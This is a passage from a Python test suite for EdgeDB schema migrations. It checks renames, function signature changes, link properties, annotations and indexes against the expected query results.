"did you create object type 'test::Reply'?",
"did you alter property 'content' of object type 'test::Post'?",
])
async def test_edgeql_migration_rebase_03(self):
await self.migrate('''
abstract type Named {
required property name -> str;
};
type Org;
abstract type OrgBound {
required link org -> Org;
};
abstract type OrgUniquelyNamed
extending Named, OrgBound
{
constraint exclusive on ((.name, .org))
}
''')
await self.start_migration('''
abstract type Named {
required property name -> str;
};
type Org;
abstract type Resource;
abstract type OrgBound {
required link org -> Org;
};
abstract type OrgUniquelyNamedResource
extending Named, Resource, OrgBound
{
delegated constraint exclusive on ((.name, .org))
}
''')
# N.B.: these prompts are OK but not canonical; if they are
# broken in favor of something better, just fix them.
await self.interact([
("did you drop object type 'test::OrgUniquelyNamed'?", "n"),
"did you create object type 'test::Resource'?",
"did you rename object type 'test::OrgUniquelyNamed' to "
"'test::OrgUniquelyNamedResource'?",
"did you alter object type 'test::OrgUniquelyNamedResource'?",
])
async def test_edgeql_migration_rename_01(self):
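# Rename a type and add a new property to it in one migration.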
await self.migrate('''
type Foo;
''')
await self.start_migration('''
type Bar {
property asdf -> str;
};
''')
await self.interact([
"did you rename object type 'test::Foo' to 'test::Bar'?",
"did you create property 'asdf' of object type 'test::Bar'?",
])
async def test_edgeql_migration_rename_02(self):
await self.migrate('''
type Foo {
property asdf -> str;
};
type Bar extending Foo {
overloaded property asdf -> str;
};
''')
await self.start_migration('''
type Foo {
property womp -> str;
};
type Bar extending Foo {
overloaded property womp -> str {
annotation title := "foo";
};
};
''')
await self.interact([
"did you rename property 'asdf' of object type 'test::Foo' to "
"'womp'?" ,
"did you create annotation 'std::title' of property 'womp'?",
])
async def test_edgeql_migration_rename_03(self):
await self.migrate('''
abstract constraint Asdf { using (__subject__ < 10) };
type Foo {
property x -> int64 {
constraint Asdf;
}
}
type Bar extending Foo;
''')
await self.start_migration('''
abstract constraint Womp { using (__subject__ < 10) };
type Foo {
property x -> int64 {
constraint Womp;
}
}
type Bar extending Foo;
''')
await self.interact([
"did you rename abstract constraint 'test::Asdf' to "
"'test::Womp'?",
])
async def test_edgeql_migration_eq_function_01(self):
await self.migrate(r"""
function hello01(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello01(1);""",
['hello1'],
)
# add an extra parameter with a default (so it can be omitted
# in principle)
await self.migrate(r"""
function hello01(a: int64, b: int64=42) -> str
using edgeql $$
SELECT 'hello' ++ <str>(a + b)
$$
""")
await self.assert_query_result(
r"""SELECT hello01(1);""",
['hello43'],
)
await self.assert_query_result(
r"""SELECT hello01(1, 2);""",
['hello3'],
)
async def test_edgeql_migration_eq_function_02(self):
await self.migrate(r"""
function hello02(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello02(1);""",
['hello1'],
)
# add an extra parameter with a default (so it can be omitted
# in principle)
await self.migrate(r"""
function hello02(a: int64, b: OPTIONAL int64=42) -> str
using edgeql $$
SELECT 'hello' ++ <str>(a + b)
$$
""")
await self.assert_query_result(
r"""SELECT hello02(1);""",
['hello43'],
)
await self.assert_query_result(
r"""SELECT hello02(1, 2);""",
['hello3'],
)
async def test_edgeql_migration_eq_function_03(self):
await self.migrate(r"""
function hello03(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello03(1);""",
['hello1'],
)
# add an extra parameter with a default (so it can be omitted
# in principle)
await self.migrate(r"""
function hello03(a: int64, NAMED ONLY b: int64=42) -> str
using edgeql $$
SELECT 'hello' ++ <str>(a + b)
$$
""")
await self.assert_query_result(
r"""SELECT hello03(1);""",
['hello43'],
)
await self.assert_query_result(
r"""SELECT hello03(1, b := 2);""",
['hello3'],
)
async def test_edgeql_migration_eq_function_04(self):
await self.migrate(r"""
function hello04(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello04(1);""",
['hello1'],
)
# same parameters, different return type
await self.migrate(r"""
function hello04(a: int64) -> int64
using edgeql $$
SELECT -a
$$
""")
await self.assert_query_result(
r"""SELECT hello04(1);""",
[-1],
)
async def test_edgeql_migration_eq_function_05(self):
await self.migrate(r"""
function hello05(a: int64) -> str
using edgeql $$
SELECT <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello05(1);""",
['1'],
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello05(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$
""")
await self.assert_query_result(
r"""SELECT hello05(1);""",
[[1]],
)
@test.xfail('''
It should be possible to change the underlying function (to a
compatible one) of a default value without explicitly dropping
the default first.
Currently this kind of works... by proposing we delete the property
and recreate it.
''')
async def test_edgeql_migration_eq_function_06(self):
await self.migrate(r"""
function hello06(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base {
property foo -> int64 {
# use the function in default value computation
default := len(hello06(2) ++ hello06(123))
}
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello06(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base {
property foo -> int64 {
# use the function in default value computation
default := len(hello06(2) ++ hello06(123))
}
}
""")
await self.con.execute(r"""
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{4, 2},
)
async def test_edgeql_migration_eq_function_07(self):
await self.migrate(r"""
function hello07(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base {
# use the function in computable value
property foo := len(hello07(2) ++ hello07(123))
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello07(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base {
# use the function in computable value
property foo := len(hello07(2) ++ hello07(123))
}
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{2},
)
async def test_edgeql_migration_eq_function_08(self):
await self.migrate(r"""
function hello08(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
# use the function in an alias directly
alias foo := len(hello08(2) ++ hello08(123));
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello08(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
# use the function in an alias directly
alias foo := len(hello08(2) ++ hello08(123));
""")
await self.assert_query_result(
r"""SELECT foo;""",
{2},
)
async def test_edgeql_migration_eq_function_09(self):
await self.migrate(r"""
function hello09(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base;
# use the function in an alias directly
alias BaseAlias := (
SELECT Base {
foo := len(hello09(2) ++ hello09(123))
}
);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT BaseAlias.foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello09(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base;
# use the function in an alias directly
alias BaseAlias := (
SELECT Base {
foo := len(hello09(2) ++ hello09(123))
}
);
""")
await self.assert_query_result(
r"""SELECT BaseAlias.foo;""",
{2},
)
async def test_edgeql_migration_eq_function_10(self):
await self.migrate(r"""
function hello10(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base {
required property foo -> int64 {
# use the function in a constraint expression
constraint expression on (len(hello10(__subject__)) < 2)
}
}
""")
await self.con.execute(r"""
SET MODULE test;
""")
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r'invalid foo'):
async with self.con.transaction():
await self.con.execute(r"""
INSERT Base {foo := 42};
""")
# same parameters, different return type (array)
await self.migrate(r"""
function hello10(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base {
required property foo -> int64 {
# use the function in a constraint expression
constraint expression on (len(hello10(__subject__)) < 2)
}
}
""")
# no problem with the constraint now
await self.con.execute(r"""
INSERT Base {foo := 42};
""")
async def test_edgeql_migration_eq_function_11(self):
await self.migrate(r"""
function hello11(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello11(1);""",
['hello1'],
)
await self.migrate(r"""
# replace the function with a new one by the same name
function hello11(a: str) -> str
using edgeql $$
SELECT 'hello' ++ a
$$
""")
await self.assert_query_result(
r"""SELECT hello11(' world');""",
['hello world'],
)
# make sure that the old one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello11\(arg0: std::int64\)" does not exist'):
await self.con.execute(
r"""SELECT hello11(1);"""
)
async def test_edgeql_migration_eq_function_12(self):
await self.migrate(r"""
function hello12(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello12(1);""",
['hello1'],
)
await self.migrate(r"""
function hello12(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
# make the function polymorphic
function hello12(a: str) -> str
using edgeql $$
SELECT 'hello' ++ a
$$;
""")
await self.assert_query_result(
r"""SELECT hello12(' world');""",
['hello world'],
)
# make sure that the old one still works
await self.assert_query_result(
r"""SELECT hello12(1);""",
['hello1'],
)
async def test_edgeql_migration_eq_function_13(self):
# this is the inverse of test_edgeql_migration_eq_function_12
await self.migrate(r"""
# start with a polymorphic function
function hello13(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
function hello13(a: str) -> str
using edgeql $$
SELECT 'hello' ++ a
$$;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello13(' world');""",
['hello world'],
)
await self.assert_query_result(
r"""SELECT hello13(1);""",
['hello1'],
)
await self.migrate(r"""
# remove one of the 2 versions
function hello13(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
""")
await self.assert_query_result(
r"""SELECT hello13(1);""",
['hello1'],
)
# make sure that the other one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello13\(arg0: std::str\)" does not exist'):
await self.con.execute(
r"""SELECT hello13(' world');"""
)
async def test_edgeql_migration_eq_function_14(self):
await self.migrate(r"""
function hello14(a: str, b: str) -> str
using edgeql $$
SELECT a ++ b
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello14('hello', '14');""",
['hello14'],
)
await self.migrate(r"""
# Replace the function with a new one by the same name,
# but working with arrays.
function hello14(a: array<str>, b: array<str>) -> array<str>
using edgeql $$
SELECT a ++ b
$$
""")
await self.assert_query_result(
r"""SELECT hello14(['hello'], ['14']);""",
[['hello', '14']],
)
# make sure that the old one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello14\(arg0: std::str, arg1: std::str\)" '
r'does not exist'):
await self.assert_query_result(
r"""SELECT hello14('hello', '14');""",
['hello14'],
)
async def test_edgeql_migration_eq_function_15(self):
await self.migrate(r"""
function hello15(a: str, b: str) -> str
using edgeql $$
SELECT a ++ b
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello15('hello', '15');""",
['hello15'],
)
await self.migrate(r"""
# Replace the function with a new one by the same name,
# but working with a tuple.
function hello15(a: tuple<str, str>) -> str
using edgeql $$
SELECT a.0 ++ a.1
$$
""")
await self.assert_query_result(
r"""SELECT hello15(('hello', '15'));""",
['hello15'],
)
# make sure that the old one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello15\(arg0: std::str, arg1: std::str\)" '
r'does not exist'):
await self.assert_query_result(
r"""SELECT hello15('hello', '15');""",
['hello15'],
)
async def test_edgeql_migration_eq_function_16(self):
# Test prop default and function order of definition. The
# function happens to be shadowing a "std" function. We expect
# that the function `test::str_upper` will actually be used.
#
# See also `test_schema_get_migration_21`
await self.migrate(r"""
type Foo16 {
property name -> str {
default := str_upper('some_name');
};
}
function str_upper(val: str) -> str {
using (SELECT '^^' ++ std::str_upper(val) ++ '^^');
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT str_upper('hello');""",
['^^HELLO^^'],
)
await self.con.execute("""
INSERT Foo16;
""")
await self.assert_query_result(
r"""SELECT Foo16.name;""",
['^^SOME_NAME^^'],
)
async def test_edgeql_migration_eq_linkprops_01(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child;
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := (INSERT Child)
};
""")
# Migration adding a link property.
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> str
}
};
""")
# actually record a link property
await self.con.execute(r"""
UPDATE
Base
SET {
foo := .foo {
@bar := 'lp01'
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': {'@bar': 'lp01'}}],
)
async def test_edgeql_migration_eq_linkprops_02(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 'lp02' },
};
""")
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
# change the link property name
property bar2 -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar2 }
};
""",
[{'foo': {'@bar2': 'lp02'}}],
)
async def test_edgeql_migration_eq_linkprops_03(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> int64
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 3 },
};
""")
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
# change the link property type
property bar -> int32
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': {'@bar': 3}}],
)
async def test_edgeql_migration_eq_linkprops_04(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 'lp04' },
};
""")
await self.migrate(r"""
type Child;
type Base {
# change the link cardinality
multi link foo -> Child {
property bar -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': [{'@bar': 'lp04'}]}],
)
async def test_edgeql_migration_eq_linkprops_05(self):
await self.migrate(r"""
type Child;
type Base {
multi link foo -> Child {
property bar -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 'lp05' },
};
""")
await self.migrate(r"""
type Child;
type Base {
# change the link cardinality
link foo -> Child {
property bar -> str
}
};
""", user_input=[
'SELECT .foo LIMIT 1'
])
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': {'@bar': 'lp05'}}],
)
async def test_edgeql_migration_eq_linkprops_06(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child {
property foo -> str;
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {child := (INSERT Child)};
UPDATE Base
SET {
child := .child {
@foo := 'lp06',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
link child -> Child {
property foo -> str;
# add another link prop
property bar -> int64;
}
};
""")
# update the existing data with a new link prop 'bar'
await self.con.execute(r"""
UPDATE Base
SET {
child := .child {
@bar := 111,
@foo := 'lp06',
},
};
""")
await self.assert_query_result(
r"""
SELECT Base {
child: {
@foo,
@bar
}
};
""",
[{
'child': {
'@foo': 'lp06',
'@bar': 111
}
}],
)
async def test_edgeql_migration_eq_linkprops_07(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
property foo -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
UPDATE Derived
SET {
child := .child {
@foo := 'lp07',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
# move the link property earlier in the inheritance tree
link child -> Child {
property foo -> str
}
};
type Derived extending Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp07',
}
}],
)
async def test_edgeql_migration_eq_linkprops_08(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child {
property foo -> str
}
};
type Derived extending Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
""")
await self.con.execute(r"""
UPDATE Derived
SET {
child := .child {
@foo := 'lp08',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
# move the link property later in the inheritance tree
property foo -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Derived {
children := count(.child)
};
""",
[{
'children': 1,
}],
)
await self.assert_query_result(
r"""
SELECT Derived {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp08',
}
}],
)
async def test_edgeql_migration_eq_linkprops_09(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
property foo -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
UPDATE Derived
SET {
child := .child {
@foo := 'lp09',
},
};
""")
await self.migrate(r"""
type Child;
# factor out the link property all the way to an abstract link
abstract link base_child {
property foo -> str;
}
type Base {
link child extending base_child -> Child;
};
type Derived extending Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp09',
}
}],
)
async def test_edgeql_migration_eq_linkprops_10(self):
# reverse of the test_edgeql_migration_eq_linkprops_09 refactoring
await self.migrate(r"""
type Child;
abstract link base_child {
property foo -> str;
}
type Base {
link child extending base_child -> Child;
};
type Derived extending Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
UPDATE Derived
SET {
child := .child {
@foo := 'lp10',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
# move the link property later in the inheritance tree
property foo -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Derived {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp10',
}
}],
)
await self.migrate("")
async def test_edgeql_migration_eq_linkprops_11(self):
# merging a link with the same properties
await self.migrate(r"""
type Thing;
type Owner {
link item -> Thing {
property foo -> str;
}
};
type Renter {
link item -> Thing {
property foo -> str;
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Owner {item := (INSERT Thing)};
UPDATE Owner
SET {
item := .item {
@foo := 'owner_lp11',
},
};
INSERT Renter {item := (INSERT Thing)};
UPDATE Renter
SET {
item := .item {
@foo := 'renter_lp11',
},
};
""")
await self.migrate(r"""
type Thing;
type Base {
link item -> Thing {
property foo -> str;
}
};
type Owner extending Base;
type Renter extending Base;
""")
await self.assert_query_result(
r"""
SELECT Owner {
item: {
@foo,
}
};
""",
[{
'item': {
'@foo': 'owner_lp11',
}
}],
)
await self.assert_query_result(
r"""
SELECT Renter {
item: {
@foo,
}
};
""",
[{
'item': {
'@foo': 'renter_lp11',
}
}],
)
async def test_edgeql_migration_eq_linkprops_12(self):
# merging a link with different properties
await self.migrate(r"""
type Thing;
type Owner {
link item -> Thing {
property foo -> str;
}
};
type Renter {
link item -> Thing {
property bar -> str;
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Owner {item := (INSERT Thing)};
UPDATE Owner
SET {
item := .item {
@foo := 'owner_lp11',
},
};
INSERT Renter {item := (INSERT Thing)};
UPDATE Renter
SET {
item := .item {
@bar := 'renter_lp11',
},
};
""")
await self.migrate(r"""
type Thing;
type Base {
link item -> Thing {
property foo -> str;
property bar -> str;
}
};
type Owner extending Base;
type Renter extending Base;
""")
await self.assert_query_result(
r"""
SELECT Owner {
item: {
@foo,
@bar,
}
};
""",
[{
'item': {
'@foo': 'owner_lp11',
'@bar': None,
}
}],
)
await self.assert_query_result(
r"""
SELECT Renter {
item: {
@foo,
@bar,
}
};
""",
[{
'item': {
'@foo': None,
'@bar': 'renter_lp11',
}
}],
)
async def test_edgeql_migration_eq_annotation_01(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [],
}],
)
await self.migrate(r"""
type Base {
# add a title annotation
annotation title := 'Base description 01'
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 01'
}],
}],
)
await self.migrate(r"""
# add inheritable and non-inheritable annotations
abstract annotation foo_anno;
abstract inheritable annotation bar_anno;
type Base {
annotation title := 'Base description 01';
annotation foo_anno := 'Base foo_anno 01';
annotation bar_anno := 'Base bar_anno 01';
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 01'
}, {
'name': 'test::bar_anno',
'@value': 'Base bar_anno 01'
}, {
'name': 'test::foo_anno',
'@value': 'Base foo_anno 01'
}],
}],
)
await self.migrate(r"""
abstract annotation foo_anno;
abstract inheritable annotation bar_anno;
type Base {
annotation title := 'Base description 01';
annotation foo_anno := 'Base foo_anno 01';
annotation bar_anno := 'Base bar_anno 01';
}
# extend Base
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 01'
}, {
'name': 'test::bar_anno',
'@value': 'Base bar_anno 01'
}, {
'name': 'test::foo_anno',
'@value': 'Base foo_anno 01'
}],
}, {
'name': 'test::Derived',
'annotations': [{
'name': 'test::bar_anno',
'@value': 'Base bar_anno 01'
}],
}],
)
async def test_edgeql_migration_eq_annotation_02(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [],
}],
)
await self.migrate(r"""
abstract annotation foo_anno;
type Base {
annotation title := 'Base description 02';
annotation foo_anno := 'Base foo_anno 02';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 02'
}, {
'name': 'test::foo_anno',
'@value': 'Base foo_anno 02'
}],
}, {
'name': 'test::Derived',
# annotation not inherited
'annotations': [],
}],
)
await self.migrate(r"""
# remove foo_anno
type Base {
annotation title := 'Base description 02';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 02'
}],
}, {
'name': 'test::Derived',
'annotations': [],
}],
)
async def test_edgeql_migration_eq_annotation_03(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [],
}],
)
await self.migrate(r"""
abstract inheritable annotation bar_anno;
type Base {
annotation title := 'Base description 03';
annotation bar_anno := 'Base bar_anno 03';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 03'
}, {
'name': 'test::bar_anno',
'@value': 'Base bar_anno 03'
}],
}, {
'name': 'test::Derived',
# annotation inherited
'annotations': [{
'name': 'test::bar_anno',
'@value': 'Base bar_anno 03'
}],
}],
)
await self.migrate(r"""
# remove bar_anno
type Base {
annotation title := 'Base description 03';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 03'
}],
}, {
'name': 'test::Derived',
'annotations': [],
}],
)
async def test_edgeql_migration_eq_annotation_04(self):
# Test migration of annotation value and nothing else.
await self.migrate(r"""
abstract annotation description;
type Base {
annotation description := "1";
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'test::description',
'@value': '1',
}],
}],
)
await self.migrate(r"""
abstract annotation description;
type Base {
annotation description := "2";
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'test::description',
'@value': '2',
}],
}],
)
async def test_edgeql_migration_describe_annot_01(self):
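# Renaming an abstract annotation should be proposed as a
# RENAME rather than a drop and re-create.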
await self.migrate('''
abstract annotation foo;
type Base {
annotation foo := "1";
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation bar;
type Base {
annotation bar := "1";
};
}
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT ANNOTATION test::foo '
'RENAME TO test::bar;'
)
}],
},
})
async def test_edgeql_migration_eq_index_01(self):
await self.con.execute("""
SET MODULE test;
""")
await self.migrate(r"""
type Base {
property name -> str;
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
await self.migrate(r"""
type Base {
property name -> str;
# an index
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
await self.migrate(r"""
type Base {
# rename the indexed property
property title -> str;
index on (.title);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.title'
}]
}],
)
async def test_edgeql_migration_eq_index_02(self):
await self.migrate(r"""
type Base {
property name -> str;
index on (.name);
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
await self.migrate(r"""
type Base {
property name -> str;
# remove the index
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
async def test_edgeql_migration_eq_index_03(self):
await self.migrate(r"""
type Base {
property name -> int64;
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
await self.migrate(r"""
type Base {
property name -> int64;
# an index
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
await self.migrate(r"""
type Base {
# change the indexed property type
property name -> int32;
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
async def test_edgeql_migration_eq_index_04(self):
await self.migrate(r"""
type Base {
property first_name -> str;
property last_name -> str;
property name := .first_name ++ ' ' ++ .last_name;
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
